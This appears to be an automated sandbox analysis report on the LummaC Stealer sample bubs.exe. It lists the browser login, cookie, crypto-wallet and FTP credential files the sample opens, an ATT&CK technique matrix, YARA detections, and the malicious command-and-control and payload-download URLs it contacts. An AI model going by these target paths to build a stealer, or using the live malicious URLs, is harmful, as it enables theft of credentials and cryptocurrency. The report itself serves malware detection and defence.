Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	Directory queried: C:\Users\user\Documents\KLIZUSIQEN	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	Directory queried: C:\Users\user\Documents\KLIZUSIQEN	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	Directory queried: C:\Users\user\Documents\EOWRVPQCCS	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	Directory queried: C:\Users\user\Documents\EOWRVPQCCS	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	Directory queried: C:\Users\user\Documents\QCOILOQIKC	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	Directory queried: C:\Users\user\Documents\QCOILOQIKC	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	Directory queried: C:\Users\user\Documents\KLIZUSIQEN	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Extra\bubs.exe	Directory queried: C:\Users\user\Documents\KLIZUSIQEN	Jump to behavior

Source: Yara match

File source: Process Memory Space: bubs.exe PID: 4140, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: bubs.exe PID: 4140, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Windows Management Instrumentation	1 DLL Side-Loading	11 Process Injection	1 Masquerading	2 OS Credential Dumping	1 Query Registry	Remote Services	1 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 PowerShell	Boot or Logon Initialization Scripts	1 DLL Side-Loading	121 Virtualization/Sandbox Evasion	LSASS Memory	221 Security Software Discovery	Remote Desktop Protocol	41 Data from Local System	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	11 Process Injection	Security Account Manager	1 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Deobfuscate/Decode Files or Information	NTDS	121 Virtualization/Sandbox Evasion	Distributed Component Object Model	Input Capture	114 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Obfuscated Files or Information	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	1 System Network Configuration Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	Compile After Delivery	DCSync	11 File and Directory Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	22 System Information Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\Extra\bubs.exe	24%	ReversingLabs
C:\Users\user\AppData\Roaming\Extra\cr.dll	16%	ReversingLabs	Win32.Trojan.LummaC

Source	Detection	Scanner	Label
https://appr0dress.cyou/	0%	Avira URL Cloud	safe
https://iplogger.co	0%	Avira URL Cloud	safe
appr0dress.cyou	0%	Avira URL Cloud	safe
http://iplogger.co	0%	Avira URL Cloud	safe
https://appr0dress.cyou/api	100%	Avira URL Cloud	malware
https://jerseysurffilmfestival.com/wakena.zip	100%	Avira URL Cloud	malware
https://jerseysurffilmfestival.com	100%	Avira URL Cloud	malware
https://appr0dress.cyou:443/api	100%	Avira URL Cloud	malware
https://appr0dress.cyou/7	0%	Avira URL Cloud	safe
http://jerseysurffilmfestival.com	100%	Avira URL Cloud	malware
https://iplogger.co/	0%	Avira URL Cloud	safe
https://iplogger.co/1twXC4	100%	Avira URL Cloud	phishing

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
jerseysurffilmfestival.com	185.61.154.28	true	false	unknown
iplogger.co	172.67.167.249	true	false	unknown
appr0dress.cyou	188.114.96.3	true	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
appr0dress.cyou	true	Avira URL Cloud: safe	unknown
https://jerseysurffilmfestival.com/wakena.zip	false	Avira URL Cloud: malware	unknown
peepburry828.sbs	false		high
p10tgrace.sbs	false		high
https://appr0dress.cyou/api	true	Avira URL Cloud: malware	unknown
processhol.sbs	false		high
p3ar11fter.sbs	false		high
https://iplogger.co/1twXC4	false	Avira URL Cloud: phishing	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	bubs.exe, 00000003.00000003.2326379310.0000000003F7D000.00000004.00000800.00020000.00000000.sdmp, bubs.exe, 00000003.00000003.2326205569.0000000003F7F000.00000004.00000800.00020000.00000000.sdmp, bubs.exe, 00000003.00000003.2326253410.0000000003F7D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	bubs.exe, 00000003.00000003.2326379310.0000000003F7D000.00000004.00000800.00020000.00000000.sdmp, bubs.exe, 00000003.00000003.2326205569.0000000003F7F000.00000004.00000800.00020000.00000000.sdmp, bubs.exe, 00000003.00000003.2326253410.0000000003F7D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/License	powershell.exe, 00000001.00000002.2456915849.000001E429AA2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	bubs.exe, 00000003.00000003.2326379310.0000000003F7D000.00000004.00000800.00020000.00000000.sdmp, bubs.exe, 00000003.00000003.2326205569.0000000003F7F000.00000004.00000800.00020000.00000000.sdmp, bubs.exe, 00000003.00000003.2326253410.0000000003F7D000.00000004.00000800.00020000.00000000.sdmp	false		high
http://jerseysurffilmfestival.com	powershell.exe, 00000001.00000002.2436521329.000001E41B39B000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg	bubs.exe, 00000003.00000003.2352033803.0000000003F47000.00000004.00000800.00020000.00000000.sdmp	false		high
https://iplogger.co	powershell.exe, 00000001.00000002.2436521329.000001E41B8C5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2436521329.000001E419D5A000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://iplogger.co	powershell.exe, 00000001.00000002.2436521329.000001E41B8E5000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://x1.c.lencr.org/0	bubs.exe, 00000003.00000003.2350461997.000000000403D000.00000004.00000800.00020000.00000000.sdmp	false		high
http://x1.i.lencr.org/0	bubs.exe, 00000003.00000003.2350461997.000000000403D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	bubs.exe, 00000003.00000003.2326379310.0000000003F7D000.00000004.00000800.00020000.00000000.sdmp, bubs.exe, 00000003.00000003.2326205569.0000000003F7F000.00000004.00000800.00020000.00000000.sdmp, bubs.exe, 00000003.00000003.2326253410.0000000003F7D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/	powershell.exe, 00000001.00000002.2456915849.000001E429AA2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://nuget.org/nuget.exe	powershell.exe, 00000001.00000002.2456915849.000001E42995F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2456915849.000001E429AA2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.mozilla.org/products/firefoxgro.all	bubs.exe, 00000003.00000003.2351606017.0000000004257000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000001.00000002.2436521329.000001E4198F1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.mozilla.or	bubs.exe, 00000003.00000003.2351479043.0000000003F70000.00000004.00000800.00020000.00000000.sdmp	false		high
https://jerseysurffilmfestival.com	powershell.exe, 00000001.00000002.2436521329.000001E419B18000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2436521329.000001E41AF32000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://nuget.org/NuGet.exe	powershell.exe, 00000001.00000002.2456915849.000001E42995F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2456915849.000001E429AA2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://appr0dress.cyou/7	bubs.exe, 00000003.00000002.2415661139.0000000000F9E000.00000004.00000020.00020000.00000000.sdmp, bubs.exe, 00000003.00000003.2414209775.0000000000F9C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	bubs.exe, 00000003.00000003.2326379310.0000000003F7D000.00000004.00000800.00020000.00000000.sdmp, bubs.exe, 00000003.00000003.2326205569.0000000003F7F000.00000004.00000800.00020000.00000000.sdmp, bubs.exe, 00000003.00000003.2326253410.0000000003F7D000.00000004.00000800.00020000.00000000.sdmp	false		high
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000001.00000002.2436521329.000001E419B18000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000001.00000002.2436521329.000001E419B18000.00000004.00000800.00020000.00000000.sdmp	false		high
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.	bubs.exe, 00000003.00000003.2352033803.0000000003F47000.00000004.00000800.00020000.00000000.sdmp	false		high
https://go.micro	powershell.exe, 00000001.00000002.2436521329.000001E41AF32000.00000004.00000800.00020000.00000000.sdmp	false		high
